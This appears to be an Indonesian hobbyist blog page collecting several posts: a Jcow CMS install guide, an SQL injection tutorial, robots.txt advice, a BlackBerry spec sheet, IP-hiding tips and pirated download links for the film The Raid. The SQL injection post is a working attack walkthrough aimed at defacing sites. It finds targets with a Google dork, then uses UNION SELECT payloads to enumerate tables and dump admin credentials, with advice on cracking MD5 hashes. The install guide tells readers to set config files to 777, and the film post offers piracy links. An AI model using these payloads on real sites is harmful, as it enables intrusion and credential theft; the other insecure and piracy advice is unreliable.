Instalasi Jcow ( Sosial Networking ) Di Free Web Hosting

Kali ini saya akan berbagi tutorial singkat instalasi CMS Jcow di free web hosting. Tanpa panjang lebar langsung saja. Langkah pertama, download file jcow 6.0.1 DISINI.
Untuk Jcow 7.0 tidak support untuk free web hosting.
Selanjutnya anda harus mempunyai hosting sendiri, tapi kali ini sesuai judul di atas saya menggunakan free web hosting dan saya anggap kalian sudah paham tentang web hosting. Disini saya menggunakan idhostinger[dot]com.
Langkah selanjutnya,

+Login ke cpanel, buka file manager - public_html - upload, kemudian upload file jcow yang sudah kalian download tadi. (Lihat Gambar)

+Setelah proses upload selesai, masuk ke folder install, pilih / centang config.php - Chmod, Rubah perms menjadi 777.

+Lalu seperti cara di atas, buka folder "my" rubah perms config.php menjadi 777.
+Kemudian kembali ke cpanel - masuk ke Database MySQL, buat database baru.
+Buka tab baru di browser anda, ketikkan http://www.namadomainanda.com/install.php lalu isi kolom sesuai database yang anda buat tadi. (Lihat Gambar)

+Tinggal satu langkah lagi, masuk ke cpanel - file manager - public_html, delete file install.php
+Silahkan berkreasi, rubah tampilan sesuai keinginan kalian.
+KLIK DISINI untuk Live Demo.
+Selesai.

Thank's For Reading

READMORE

Tutorial SQL Injection Step by Step [ Dummies ]

Sebelum men daface sebuah situs, kita bisa menggunakan "dork Sql Injection" dengan bantuan om kita semua ( om google )
Code:

inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"

trus yg saya dapat :
Code:
http://www.victim.com/detailproduct.php?id=75

untuk mengecek bug pada suatu web tambahkan single quote ( ' ) dibelakang url
Code:
http://www.victim.com/detailproduct.php?id=75'


ternyata ada bug-nya, muncul pesan error :
Code:

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '\' and b.id=a.cat' at line 1


Untuk mencari column gunakan perintah [ order by ]
Code:
http://www.victim.com/detailproduct.php?id=75 order by 1--

dimulai dengan angka 1, selanjutnya 2, dst sampai muncul pesan error

pada target kita kali ini, error muncul pada angka 19
Code:
http://www.victim.com/detailproduct.php?id=75 order by 19--

muncul pesan error:
Unknown column '19' in 'order clause'

jadi angka yang diambil adalah 19-1 = 18 (jumlah column adalah 18)

Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah "union all select"
Code:
http://www.victim.com/detailproduct.php?id=-75 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter ID 75

akan muncul "angka ajaib" : 3, 11 dan 18
kita pilih salah satunya saja, misal 3

trus kita cari versi Database MySql-nya dengan perintah [version()] atau [@@version] pada angka 3
Code:
http://www.victim.com/detailproduct.php?id=-75 union all select
1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--


muncul tulisan :
5.0.90-community

wewww...ternyata versi 5, klo versi 4 sy angkat tangan.....
nb : lebih mudah versi 5, karena sebentar kita akan mencari informasi table dan column dari information_schema, dimana information_schema tidak terdapat pada database MySql versi 4. Jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya... lol

Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka ajaib
dan "+from+information_schema.tables+where+table_schema=database()--" di belakang angka 18
Code:
http://www.victim.com/detailproduct.php?id=-75 union all select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+where table_schema=database()--

akan muncul nama-nama table :
Code:
login,tbanner,tcatprod,tproduct,tset

Selanjutnya kita cari column dari table yg ada hubungannya dengan user+password,
kali ini kita ambil table "login"
sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :
http://cyber4rt.com/~converter
ketik : login
pilih ASCII to Hex
hasilnya : 6c6f67696e

Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 3 dan "+from+information_schema.columns+where+table_name=0xHEXA--" di akhir URL

ganti HEXA dengan hasil convert tadi yaitu : 6c6f67696e
tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert
ke hexa
Code:
http://www.victim.com/detailproduct.php?id=-75 union all select
1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+info
rmation_schema.columns+where+table_name=0x6c6f67696e--

muncul column : user,pass

untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 3 dan +from+NAMATABLE-- pada akhir URL

ganti column 1 dengan "user" dan column2 dengan "pass"
0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa
NAMA TABLE diganti dengan "login" untuk mengambil informasi dari table yang bernama "login"
Code:
http://www.victim.com/detailproduct.php?id=-75 union all select
1,2,group_concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+login--


hasil : admin:admin
jadi,
user = admin
password = admin
nb : Jika ada yang mendapatkan password yang berupa MD5 seperti "21232f297a57a5a743894a0e4a801fc3" atau yang lainnya, silahkan anda hash di sini www.md5decrypter.com

Selesai ??? belum.... :p
Langkah selanjutnya adalah mencari Admin Page target kita dengan adminfinder

READMORE

Penjelasan Kegunaan robot.txt

Pasti pernah dengar yang namanya Robot.txt kan ? nah itu adalah Suatu File Akses Dimana Search Engine Tidak Di Perbolehkan Untuk Mengindex Cpanel Atau root Direktori Hosting Yang Di Rahasiakan ...

Hal Ini Berguna Agar , Para Hacker script kiddies yang mencari dork di mbah gugel Tidak dapat menemui dan Mengetahui Isi Dari Dalam Cpanel tersebut ...
Oke nah Silahkan Copy Paste Source Code nya Dan mastah Simpan Dengan Extensi.txt kemudian Upload Ke root rahasia Hosting mastah ..

Quote:

------------------------------------------------------------------------Copy >

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/ delivery/). This file is required in the
# event that you use OpenX with virtual domains, and have one
# set up for the delivery interface.
User-agent: *
Disallow: /

-------------------------------------------------------------------Stop Copy >

*Moga berguna bagi para mastah

READMORE

Blackberry Warna Warni 'Murah' Tanpa 3G

Research In Motion (RIM) telah memastikan kehadiran BlackBerry Curve 9220. Ia digadang-gadang sebagai BlackBerry 'murah' lantaran dibanderol USD 210 atau di kisaran Rp 2 juta. Sayang, perangkat yang dihadirkan dengan pilihan warna-warni ini masih tanpa konektivitas 3G.

Ya, dalam spesifikasi lengkapnya, Curve 9220 cuma sebatas menyokong konektivitas GSM skala GPRS dan EDGE. Artinya, ia masih seperti pendahulunya, yakni BlackBerry Curve 9520 Gemini yang juga ditempatkan di segmen menengah ke bawah.

Tampilannya keduanya pun 11-12. Hanya saja, Curve 9220 tampil sedikit berbeda dengan tombol khusus BlackBerry Messenger (BBM) di sisi bodi, FM radio dan sudah dibenamkan dengan BlackBerry OS 7.1.

Ia juga diklaim lebih irit dengan masa stand by bisa sampai 432 jam lantaran dibenamkan baterai Li-ion berkapasitas 1450 mAh.

Berikut spesifikasi Curve 9220:

Camera 2 megapixels. Camera features Records video, Digital zoom (5x)
Internal memory 512 MB
WiFi 802.11 b, g, n (2.4 GHz)
Bluetooth Yes (unspecified version)
Media playback Yes
Audio AAC, FLAC, MP3, OGG, WAV, WMA
Video AVI, MPEG-4
Images BMP, GIF, JPEG, PNG, TIFF
Email Push email (BlackBerry)
GSM type GSM, GPRS, EDGE
GSM bands 850, 900, 1800, 1900
Screen size 2.44 inches
Screen resolution 240 x 320
Screen type LCD (Active, Color, Backlit)
Audio / headset jack 3.5mm
RAM 512 MB
Dimensions 4.29 inches (h), 2.36 inches (w), 0.5 inches (d)
Weight 3.6 ounces



cc: Cyber4rt

READMORE

Beberapa Foto Sinyal Wi-Fi Terlihat Dalam Bentuk Cahaya

Berikut ini adalah wifi lukisan cahaya. Ini adalah persis bagaimana tampilannya seperti di udara. Sayangnya atau untungnya kita tidak bisa melihatnya dengan mata telanjang. Karena ini adalah apa yang kita akan melihat dimana-mana.

READMORE

Cara Mudah Mengganti IP Address

Banyak cara yang dapat kita lakukan, untuk dapat mengganti alamat IP , mulai dari cara manual, sampai dengan bantuan software, sekaligus.

Karna beberapa sebab:
1. Ingin mempercepat koneksi internet
2. Karena IP address di blacklist oleh website ( seperti kebanyakan web/blog malaysia yang maling artikel dari indonesia ),
3. Menyembunyikan identitas ,
4. Buka situs terlarang xD

Namun disini saya mempunyai cara simple dan berhasil, yaitu dengan bantuan sebuah situs http://anonymizer.nntime.com/
Disitu kita dapat memilih berbagai kumpulan IP negara didunia ( luar negeri ).

1. Langsung menuju situsnya : http://anonymizer.nntime.com/
2. Pilih Negara yang ingin kita pakai IP nya. ( Country & State )
3. Pilih salah satu daftar IP yang ditampilkan.
4. Terakir Masukan Alamat Web yang ingin kita kunjungi pada kotak addres tersebut kemudian [GO]
contoh : http://www.alamat.com.

Pengetesan :
Silahkan kunjungi www.whatismyip.com

Semoga sukses ^o^V

READMORE

Film The Raid Redemption

Film The Raid Redemption yang dibintangi aktor-aktor Indonesia, menggunakan bahasa Indonesia, dan lokasi Setting di Indonesia, tepatnya di Jakarta. Setelah tenar di ajang Toronto International Film Festival 2011, nama film The Raid langsung melambung tinggi, dan mendapat lirikan mesra dari Sony Pictures, yang kemudian menjadi distributor resmi film bergenre action tersebut yang kemudian diganti judulnya (ditambahi tepatnya), menjadi Film The Raid : Redemption.

Film The Raid Redemption ini resmi di rilis di seluruh dunia mulai tanggal 23 Maret 2012 di seluruh dunia, yang langsung menyedot perhatian jutaan mata para pencinta film action dan film-film hollywood. Apalagi dengan kekuatan Sony Pictures yang masuk dalam salah satu pengedar Film terbesar di dunia, menunjukkan kualitas film The Raid yang dibintangi oleh Iko Uwais dan Ray Sahetapy ini layak di edarkan.

Tentu saja hal ini berimbas pada tingkat pencarian film tersebut. Banyak sekali yang mencari dan ingin Download Film The Raid Redemption. Ketenaran film ini semakin melambung setelah ditayangkan di bioskop-bioskop Indonesia, dan rata-rata mendapatkan tanggapan positif baik dari para penonton maupun kritikus film.

Berikut link Download Film The Raid Redemption Indonesia Terbaru 2012 :

Download Part 001
Download Part 002

UPDATE

Download Part 1 The Raid 2012 DVDRip
Download Part 2 The Raid 2012 DVDRip
Download Part 3 The Raid 2012 DVDRip

READMORE